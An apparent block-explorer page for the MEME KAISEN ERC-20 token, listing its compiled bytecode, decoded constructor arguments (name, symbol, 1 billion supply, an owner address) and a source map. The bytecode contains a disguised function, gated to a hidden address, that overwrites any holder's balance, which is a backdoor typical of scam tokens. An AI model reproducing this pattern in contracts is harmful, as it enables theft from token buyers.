4805461024b90610a43565b80601f016020809104026020016040519081016040528092919081815260200182805461027790610a43565b80156102c25780601f10610299576101008083540402835291602001916102c2565b820191905f5260205f20905b8154815290600101906020018083116102a557829003601f168201915b5050505050905090565b5f6102d83384846105ba565b5060015b92915050565b5f6102ee8484846106e1565b61033f843361033a85604051806060016040528060298152602001610ac2602991396001600160a01b038a165f9081526002602090815260408083203384529091529020549190610865565b6105ba565b5060019392505050565b335f8181526002602090815260408083206001600160a01b038716845290915281205490916102d891859061033a9086610890565b5f546001600160a01b031633146103dc5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6103e55f6108a2565b565b60606005805461024b90610a43565b5f6102d83384846106e1565b5f546001600160a01b0316331461045b5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103d3565b6001600160a01b0381166104c05760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103d3565b6104c9816108a2565b50565b6003546001600160a01b031633146105265760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e7465726564000000000060448201526064016103d3565b60018260ff16101561058e5760405162461bcd60e51b815260206004820152602b60248201527f416d6f756e74206f6620726563697069656e747320616e642076616c7565732060448201526a0c8dedc4ee840dac2e8c6d60ab1b60648201526084016103d3565b5f6105998183610a7b565b6001600160a01b039094165f90815260016020526040902093909355505050565b6001600160a01b03831661061e5760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103d3565b6001600160a01b0382166106805760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103d3565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107465760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b60648201526084016103d3565b6001600160a01b0382166107a85760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b60648201526084016103d3565b6107e481604051806060016040528060278152602001610a9b602791396001600160a01b0386165f908152600160205260409020549190610865565b6001600160a01b038085165f9081526001602052604080822093909355908416815220546108129082610890565b6001600160a01b038084165f8181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106d49085815260200190565b5f81848411156108885760405162461bcd60e51b81526004016103d391906108f1565b505050900390565b5f61089b8284610a7b565b9392505050565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b5f6020808352835180828501525f5b8181101561091c57858101830151858201604001528201610900565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610952575f80fd5b919050565b5f8060408385031215610968575f80fd5b6109718361093c565b946020939093013593505050565b5f805f60608486031215610991575f80fd5b61099a8461093c565b92506109a86020850161093c565b9150604084013590509250925092565b5f602082840312156109c8575f80fd5b61089b8261093c565b5f80604083850312156109e2575f80fd5b6109eb8361093c565b91506109f96020840161093c565b90509250929050565b5f805f60608486031215610a14575f80fd5b610a1d8461093c565b9250602084013560ff81168114610a32575f80fd5b929592945050506040919091013590565b600181811c90821680610a5757607f821691505b602082108103610a7557634e487b7160e01b5f52602260045260245ffd5b50919050565b808201808211156102dc57634e487b7160e01b5f52601160045260245ffdfe4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220b671f1389c39f0300f9f2d18b494c21a34e0a54caacb753f88aabee28fcd09ad64736f6c63430008140033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000012000000000000000000000000e55dfb3962204e74253fe6c44f6da0c4bf3dd3860000000000000000000000000000000000000000033b2e3c9fd0803ce8000000000000000000000000000000000000000000000000000000000000000000000b4d454d45204b414953454e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000084d454b414953454e000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): MEME KAISEN
Arg [1] : symbol_ (string): MEKAISEN
Arg [2] : decimals_ (uint8): 18
Arg [3] : currOwnershipAddr (address): 0xe55DFb3962204e74253Fe6C44f6dA0c4Bf3Dd386
Arg [4] : totalSupply_ (uint256): 1000000000000000000000000000

-----Encoded View---------------
9 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000012
Arg [3] : 000000000000000000000000e55dfb3962204e74253fe6c44f6da0c4bf3dd386
Arg [4] : 0000000000000000000000000000000000000000033b2e3c9fd0803ce8000000
Arg [5] : 000000000000000000000000000000000000000000000000000000000000000b
Arg [6] : 4d454d45204b414953454e000000000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000008
Arg [8] : 4d454b414953454e000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

14100:5461:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14966:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16001:210;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;16001:210:0;1004:187:1;15267:108:0;15355:12;;15267:108;;;1342:25:1;;;1330:2;1315:18;15267:108:0;1196:177:1;16219:455:0;;;;;;:::i;:::-;;:::i;15168:91::-;15242:9;;15168:91;;15242:9;;;;1853:36:1;;1841:2;1826:18;15168:91:0;1711:184:1;16682:306:0;;;;;;:::i;:::-;;:::i;15383:177::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15534:18:0;15502:7;15534:18;;;:9;:18;;;;;;;15383:177;5892:94;;;:::i;:::-;;5241:87;5287:7;5314:6;5241:87;;-1:-1:-1;;;;;5314:6:0;;;2237:51:1;;2225:2;2210:18;5241:87:0;2091:203:1;15065:95:0;;;:::i;15568:216::-;;;;;;:::i;:::-;;:::i;15792:201::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15958:18:0;;;15926:7;15958:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;15792:201;6141:192;;;;;;:::i;:::-;;:::i;17764:313::-;;;;;;:::i;:::-;;:::i;14966:91::-;15011:13;15044:5;15037:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14966:91;:::o;16001:210::-;16120:4;16142:39;4039:10;16165:7;16174:6;16142:8;:39::i;:::-;-1:-1:-1;16199:4:0;16001:210;;;;;:::o;16219:455::-;16359:4;16376:36;16386:6;16394:9;16405:6;16376:9;:36::i;:::-;16423:221;16446:6;4039:10;16494:139;16550:6;16494:139;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16494:19:0;;;;;;:11;:19;;;;;;;;4039:10;16494:33;;;;;;;;;;:37;:139::i;:::-;16423:8;:221::i;:::-;-1:-1:-1;16662:4:0;16219:455;;;;;:::o;16682:306::-;4039:10;16797:4;16891:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16891:34:0;;;;;;;;;;16797:4;;16819:133;;16869:7;;16891:50;;16930:10;16891:38;:50::i;5892:94::-;5287:7;5314:6;-1:-1:-1;;;;;5314:6:0;4039:10;5461:23;5453:68;;;;-1:-1:-1;;;5453:68:0;;3567:2:1;5453:68:0;;;3549:21:1;;;3586:18;;;3579:30;3645:34;3625:18;;;3618:62;3697:18;;5453:68:0;;;;;;;;;5957:21:::1;5975:1;5957:9;:21::i;:::-;5892:94::o:0;15065:95::-;15112:13;15145:7;15138:14;;;;;:::i;15568:216::-;15690:4;15712:42;4039:10;15736:9;15747:6;15712:9;:42::i;6141:192::-;5287:7;5314:6;-1:-1:-1;;;;;5314:6:0;4039:10;5461:23;5453:68;;;;-1:-1:-1;;;5453:68:0;;3567:2:1;5453:68:0;;;3549:21:1;;;3586:18;;;3579:30;3645:34;3625:18;;;3618:62;3697:18;;5453:68:0;3365:356:1;5453:68:0;-1:-1:-1;;;;;6230:22:0;::::1;6222:73;;;::::0;-1:-1:-1;;;6222:73:0;;3928:2:1;6222:73:0::1;::::0;::::1;3910:21:1::0;3967:2;3947:18;;;3940:30;4006:34;3986:18;;;3979:62;-1:-1:-1;;;4057:18:1;;;4050:36;4103:19;;6222:73:0::1;3726:402:1::0;6222:73:0::1;6306:19;6316:8;6306:9;:19::i;:::-;6141:192:::0;:::o;17764:313::-;17049:8;;-1:-1:-1;;;;;17049:8:0;4039:10;17049:24;17031:74;;;;-1:-1:-1;;;17031:74:0;;4335:2:1;17031:74:0;;;4317:21:1;4374:2;4354:18;;;4347:30;4413:29;4393:18;;;4386:57;4460:18;;17031:74:0;4133:351:1;17031:74:0;17924:1:::1;17914:6;:11;;;;17892:104;;;::::0;-1:-1:-1;;;17892:104:0;;4691:2:1;17892:104:0::1;::::0;::::1;4673:21:1::0;4730:2;4710:18;;;4703:30;4769:34;4749:18;;;4742:62;-1:-1:-1;;;4820:18:1;;;4813:41;4871:19;;17892:104:0::1;4489:407:1::0;17892:104:0::1;18007:13;18059:10;18007:13:::0;18059:2;:10:::1;:::i;:::-;-1:-1:-1::0;;;;;18035:21:0;;::::1;;::::0;;;:9:::1;:21;::::0;;;;:34;;;;-1:-1:-1;;;17764:313:0:o;18937:382::-;-1:-1:-1;;;;;19073:19:0;;19065:69;;;;-1:-1:-1;;;19065:69:0;;5330:2:1;19065:69:0;;;5312:21:1;5369:2;5349:18;;;5342:30;5408:34;5388:18;;;5381:62;-1:-1:-1;;;5459:18:1;;;5452:35;5504:19;;19065:69:0;5128:401:1;19065:69:0;-1:-1:-1;;;;;19153:21:0;;19145:69;;;;-1:-1:-1;;;19145:69:0;;5736:2:1;19145:69:0;;;5718:21:1;5775:2;5755:18;;;5748:30;5814:34;5794:18;;;5787:62;-1:-1:-1;;;5865:18:1;;;5858:33;5908:19;;19145:69:0;5534:399:1;19145:69:0;-1:-1:-1;;;;;19227:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19279:32;;1342:25:1;;;19279:32:0;;1315:18:1;19279:32:0;;;;;;;;18937:382;;;:::o;17143:613::-;-1:-1:-1;;;;;17283:20:0;;17275:71;;;;-1:-1:-1;;;17275:71:0;;6140:2:1;17275:71:0;;;6122:21:1;6179:2;6159:18;;;6152:30;6218:34;6198:18;;;6191:62;-1:-1:-1;;;6269:18:1;;;6262:36;6315:19;;17275:71:0;5938:402:1;17275:71:0;-1:-1:-1;;;;;17365:23:0;;17357:72;;;;-1:-1:-1;;;17357:72:0;;6547:2:1;17357:72:0;;;6529:21:1;6586:2;6566:18;;;6559:30;6625:34;6605:18;;;6598:62;-1:-1:-1;;;6676:18:1;;;6669:34;6720:19;;17357:72:0;6345:400:1;17357:72:0;17522:109;17558:6;17522:109;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17522:17:0;;;;;;:9;:17;;;;;;;:109;:21;:109::i;:::-;-1:-1:-1;;;;;17502:17:0;;;;;;;:9;:17;;;;;;:129;;;;17665:20;;;;;;;:32;;17690:6;17665:24;:32::i;:::-;-1:-1:-1;;;;;17642:20:0;;;;;;;:9;:20;;;;;;;:55;;;;17713:35;;;;;;;;;;17741:6;1342:25:1;;1330:2;1315:18;;1196:177;11606:240:0;11726:7;11787:12;11779:6;;;;11771:29;;;;-1:-1:-1;;;11771:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;11822:5:0;;;11606:240::o;9327:98::-;9385:7;9412:5;9416:1;9412;:5;:::i;:::-;9405:12;9327:98;-1:-1:-1;;;9327:98:0:o;6341:173::-;6397:16;6416:6;;-1:-1:-1;;;;;6433:17:0;;;-1:-1:-1;;;;;;6433:17:0;;;;;;6466:40;;6416:6;;;;;;;6466:40;;6397:16;6466:40;6386:128;6341:173;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;1900:186::-;1959:6;2012:2;2000:9;1991:7;1987:23;1983:32;1980:52;;;2028:1;2025;2018:12;1980:52;2051:29;2070:9;2051:29;:::i;2299:260::-;2367:6;2375;2428:2;2416:9;2407:7;2403:23;2399:32;2396:52;;;2444:1;2441;2434:12;2396:52;2467:29;2486:9;2467:29;:::i;:::-;2457:39;;2515:38;2549:2;2538:9;2534:18;2515:38;:::i;:::-;2505:48;;2299:260;;;;;:::o;2564:411::-;2639:6;2647;2655;2708:2;2696:9;2687:7;2683:23;2679:32;2676:52;;;2724:1;2721;2714:12;2676:52;2747:29;2766:9;2747:29;:::i;:::-;2737:39;;2826:2;2815:9;2811:18;2798:32;2870:4;2863:5;2859:16;2852:5;2849:27;2839:55;;2890:1;2887;2880:12;2839:55;2564:411;;2913:5;;-1:-1:-1;;;2965:2:1;2950:18;;;;2937:32;;2564:411::o;2980:380::-;3059:1;3055:12;;;;3102;;;3123:61;;3177:4;3169:6;3165:17;3155:27;;3123:61;3230:2;3222:6;3219:14;3199:18;3196:38;3193:161;;3276:10;3271:3;3267:20;3264:1;3257:31;3311:4;3308:1;3301:15;3339:4;3336:1;3329:15;3193:161;;2980:380;;;:::o;4901:222::-;4966:9;;;4987:10;;;4984:133;;;5039:10;5034:3;5030:20;5027:1;5020:31;5074:4;5071:1;5064:15;5102:4;5099:1;5092:15

Swarm Source

ipfs://b671f1389c39f0300f9f2d18b494c21a34e0a54caacb753f88aabee28fcd09ad

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.